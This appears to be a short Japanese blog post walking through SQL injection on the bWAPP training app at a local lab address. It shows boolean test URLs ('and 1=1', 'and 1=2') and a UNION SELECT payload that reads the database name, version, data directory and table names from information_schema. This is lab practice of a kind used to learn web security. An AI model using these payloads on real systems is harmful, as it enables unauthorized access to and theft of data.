Hello there, ('ω')ノ
このメニューもやっていなかったようで。
Goボタンを押すと下記のようにURL上にパラメータが表示されて。
http://192.168.1.46/bWAPP/sqli_2.php?movie=1&action=go
URL上でパラメータの内容を変更して、別の情報を表示できて。
http://192.168.1.46/bWAPP/sqli_2.php?movie=2&action=go
パラメータを追加しても機能するようで。
http://192.168.1.46/bWAPP/sqli_2.php?movie=2 and 1=1 &action=go
こちらは、追加したパラメータが条件に合ってない場合の表示結果で。
http://192.168.1.46/bWAPP/sqli_2.php?movie=2 and 1=2 &action=go
セキュリティレベルをhighにしてみると、しっかりとフィルタリングされて。
http://192.168.1.46/bWAPP/sqli_2.php?movie=2 and 1=2 &action=go
このような脆弱性があると。
たとえば、下記のようにデータベースの基本情報を取得してから。
具体的なテーブル名やカラム名も取得することも可能で。
http://192.168.1.46/bWAPP/sqli_2.php?movie=0 UNION SELECT ALL null,database(),@@version,@@datadir,table_name,null,null from information_schema.tables #
Best regards, (^^ゞ